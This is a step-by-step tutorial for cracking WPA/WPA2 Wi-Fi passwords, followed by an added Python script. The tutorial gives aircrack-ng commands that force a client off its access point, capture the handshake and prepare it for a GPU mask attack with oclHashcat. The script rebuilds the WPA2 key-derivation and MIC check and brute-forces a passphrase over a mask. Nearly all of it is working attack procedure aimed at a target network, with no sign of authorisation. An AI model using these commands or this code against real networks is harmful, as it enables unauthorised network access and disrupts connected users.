There are many ways to crack a WPA/WPA2 password. A GPU (Graphics Processing Unit) is far faster than a CPU at the massively parallel work password cracking consists of: for WPA/WPA2-PSK every candidate passphrase has to be run through PBKDF2 with 4096 rounds of HMAC-SHA1 before it can be tested against the captured handshake, and a GPU can run thousands of those derivations side by side. So, we'll use the power of the GPU to speed up WPA/WPA2 cracking. The tools used will be (available for both Windows and Linux):
- Aircrack-ng
- oclHashcat (the GPU-based build of hashcat)
This guide assumes the following things:
- wlan0 is a WiFi interface
- mon0 is the interface in monitor mode
- <channel> refers to the channel the target Wi-Fi is operating on
- 00:2d:37:4b:e4:d5 is the MAC address of target AP (access point) (not real)
- cc:cc:4e:5b:d7:3d is MAC of client associated with the target AP (not real)
- # (hash symbol) marks the start of a command (all of them are run as root)
Steps:
Open up a terminal. Start by putting the Wi-Fi interface in monitor mode:
#airmon-ng start wlan0
This puts the Wi-Fi card in monitor mode and creates a new interface, mon0, for sniffing traffic. (Newer aircrack-ng releases name it wlan0mon instead; use whatever name airmon-ng prints. If NetworkManager or wpa_supplicant keep grabbing the card, run airmon-ng check kill first.) Then, start sniffing the air for all APs in the area:
#airodump-ng mon0
This lists every AP in your vicinity with its signal strength (PWR), channel (CH), encryption (ENC) and authentication (AUTH). Pick one with good signal strength whose ENC column says WPA or WPA2 and whose AUTH column says PSK, and focus on that one. Press Ctrl+C to stop the above command and type:
#airodump-ng -c <channel> --bssid 00:2d:37:4b:e4:d5 -w captured mon0
This command only sniffs for one specific AP:
- -c <channel> tells which channel to sniff (the CH column from the previous listing)
- --bssid is the MAC of the AP to target
- -w captured tells airodump-ng to write capture files with the prefix captured (it appends a sequence number, so the first file is captured-01.cap); this is where the handshake lands, for later use in recovering the password
- mon0 is the monitor interface
Notice the MAC addresses of the clients shown in the lower half of the terminal (STATION column); we'll need one for the next step. Now, open a second terminal and type:
#aireplay-ng -0 5 -a 00:2d:37:4b:e4:d5 -c cc:cc:4e:5b:d7:3d mon0
This command de-authenticates a client from its AP so that it reconnects and performs a fresh four-way handshake, which the airodump-ng in the first terminal records:
- -0 5 selects the deauthentication attack and tells how many rounds of deauth frames to send (5 here; 0 would mean keep sending forever)
- -a tells the MAC of the AP
- -c tells the MAC of the client connected to the AP (Note: leaving out -c sends a broadcast deauth, but many clients ignore those, so it doesn't work all the time. Target a specific client instead.)
- mon0 is our interface
Once airodump-ng shows "WPA handshake: 00:2d:37:4b:e4:d5" in the upper-right corner, stop aireplay-ng (otherwise it keeps deauthing the client). If it never appears, re-run the deauth or pick a different client; a handshake is only captured while a client actually reconnects. Once the handshake has been written to captured-01.cap, strip everything except the beacon and handshake frames with:
#wpaclean clean_file.cap captured-01.cap
Here, clean_file.cap is the output file, and captured-01.cap is the input file (the one airodump-ng wrote). Note the unusual argument order: output first, input second. Now, prepare the file for hashcat by:
#aircrack-ng clean_file.cap -J for_cat
Here, clean_file.cap is the cleaned capture from the previous step, and for_cat is the output for hashcat (aircrack-ng adds the .hccap extension automatically). If aircrack-ng reports that the capture contains no valid handshake, go back to the deauth step; the .hccap is only as good as the capture. Now, begin the cracking process by:
#oclhashcat -m 2500 -a 3 --session=my_session for_cat.hccap mymask.hcmask
Here:
- -m 2500 tells oclhashcat to crack WPA/WPA2 (PBKDF2 of each candidate into a PMK, then the PTK and the EAPOL MIC check against the captured handshake)
- -a 3 tells it to use a mask attack, i.e. brute force over a mask (more on it later)
- --session=my_session tells it to save the session under that name, so you can resume it later with --session=my_session --restore (a mask attack on WPA takes a very long time)
- for_cat.hccap is the path to your captured, cleaned and prepared hashcat file
- mymask.hcmask is the path to the mask file
Once it's done, the recovered password is stored in the .pot file (located in /usr/share/oclhashcat/ on Kali). Caveat: oclHashcat was merged into hashcat 3.0, and hashcat 6.0 and later deprecate -m 2500 and the .hccap format in favour of -m 22000 and the .hc22000 format produced by hcxpcapngtool; the mask syntax below is unchanged.
NOTES ON HASHCAT MASKS
The mask can use the following placeholders:
- ?u for upper case letters (A-Z, 26 characters)
- ?l for lower case letters (a-z, 26 characters)
- ?d for digits (0-9, 10 characters)
- ?s for the printable ASCII symbols, space included: space !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ (33 characters)
- ?a for all of the above (?l?u?d?s, 95 characters)
Thus, to create a mask, type a line like the following into a blank file and save it as mymask.hcmask (one mask per line; hashcat runs each line in turn):
- ?d?d?d?d?d?d?d?d for an 8-digit password (10^8 candidates; WPA passphrases are 8 to 63 characters long, so 8 positions is the shortest mask worth running)
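To make concrete what the -m 2500 step and the mask notes above amount to, here is an added example, not code from the page, from aircrack-ng or from hashcat. It expands a hashcat-style mask exactly as the placeholder list describes, and runs the per-candidate WPA2 check that oclhashcat performs (PBKDF2-HMAC-SHA1 to the PMK, PRF-512 to the PTK, HMAC over the EAPOL frame to the MIC) against a handshake the script constructs itself for a known passphrase and packs in the 392-byte hccap layout that aircrack-ng -J writes. The SSID testnet, the passphrase hunter2!, the nonces and the EAPOL-Key frame are constructed sample data; the MACs are the page's made-up ones.

```python
"""Added example, not code from the page, aircrack-ng or hashcat: the check that
oclhashcat -m 2500 -a 3 performs, run over a mask against a constructed handshake."""
import hashlib
import hmac
import itertools
import struct

# hashcat's built-in charsets (?b, the raw-byte charset, is left out here).
CHARSETS = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]

def expand_mask(mask):
    """One character set per position: '?x' is a charset, '??' a literal '?', else fixed."""
    sets, i = [], 0
    while i < len(mask):
        if mask[i] != "?":
            sets.append(mask[i])
            i += 1
            continue
        if i + 1 == len(mask):
            raise ValueError("dangling '?' at end of mask")
        tag = mask[i + 1]
        sets.append("?" if tag == "?" else CHARSETS[tag])  # KeyError on an unknown tag
        i += 2
    return sets

def keyspace(mask):
    """Number of candidates the mask expands to (hashcat prints this as its keyspace)."""
    n = 1
    for charset in expand_mask(mask):
        n *= len(charset)
    return n

def candidates(mask):
    for combo in itertools.product(*expand_mask(mask)):
        yield "".join(combo)

# --- WPA/WPA2-PSK key derivation (IEEE 802.11i) ---
def pmk(passphrase, essid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 over the sorted MACs and nonces; bytes 0..15 are the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                             hashlib.sha1).digest() for i in range(4))[:64]

def eapol_mic(kck, eapol, keyver):
    """MIC over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed."""
    frame = eapol[:81] + b"\x00" * 16 + eapol[97:]
    if keyver == 1:                                              # WPA / TKIP
        return hmac.new(kck, frame, hashlib.md5).digest()
    if keyver == 2:                                              # WPA2 / CCMP
        return hmac.new(kck, frame, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % keyver)

# --- the 392-byte hccap layout that aircrack-ng -J writes ---
HCCAP = "<36s6s6s32s32s256sii16s"  # essid, bssid, sta mac, snonce, anonce, eapol, size, keyver, mic

def pack_hccap(essid, bssid, sta, snonce, anonce, eapol, keyver, mic):
    return struct.pack(HCCAP, essid.encode(), bssid, sta, snonce, anonce,
                       eapol.ljust(256, b"\x00"), len(eapol), keyver, mic)

def unpack_hccap(blob):
    essid, bssid, sta, snonce, anonce, eapol, size, keyver, mic = struct.unpack(HCCAP, blob)
    return dict(essid=essid.rstrip(b"\x00").decode(), bssid=bssid, sta=sta, snonce=snonce,
                anonce=anonce, eapol=eapol[:size], keyver=keyver, mic=mic)

def build_handshake(passphrase, essid, bssid, sta, anonce, snonce):
    """Constructed EAPOL-Key message 2 (descriptor version 2, pairwise, MIC bit set) as hccap."""
    body = (bytes([2]) + struct.pack(">HH", 0x010A, 16) + b"\x00" * 7 + b"\x01"  # type, key info, key len, replay ctr
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                   # nonce, IV, RSC, ID
            + b"\x00" * 16 + struct.pack(">H", 0))                                # MIC placeholder, data len
    eapol = bytes([1, 3]) + struct.pack(">H", len(body)) + body                   # EAPOL v1, type 3 = Key
    kck = ptk(pmk(passphrase, essid), bssid, sta, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, 2)
    return pack_hccap(essid, bssid, sta, snonce, anonce, eapol[:81] + mic + eapol[97:], 2, mic)

def crack(hs, mask):
    """Mask attack: the first candidate whose recomputed MIC matches the captured one, else None."""
    for pw in candidates(mask):
        kck = ptk(pmk(pw, hs["essid"]), hs["bssid"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["keyver"]), hs["mic"]):
            return pw
    return None

if __name__ == "__main__":
    # Constructed sample: the page's (not real) MACs, dummy nonces, passphrase "hunter2!".
    blob = build_handshake("hunter2!", "testnet", bytes.fromhex("002d374be4d5"),
                           bytes.fromhex("cccc4e5bd73d"), bytes(range(32)), bytes(range(32, 64)))
    print("recovered:", crack(unpack_hccap(blob), "hunter2?s"))
```

The mask hunter2?s leaves a single open position, so the script finishes in well under a second; keyspace("?d?d?d?d?d?d?d?d") is 10^8 and keyspace("?a?a?a?a?a?a?a?a") is 95^8, roughly 6.6e15, which is why a mask has to encode something you know about the password's structure rather than cover every 8-character string. The per-candidate cost is the PBKDF2 call in pmk(); everything after it is a handful of HMACs, which is exactly why hashcat reports WPA speeds in the thousands of candidates per second while raw hashes run in the billions.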
That’s it for this tutorial. Honorable mention goes to blackMORE Ops.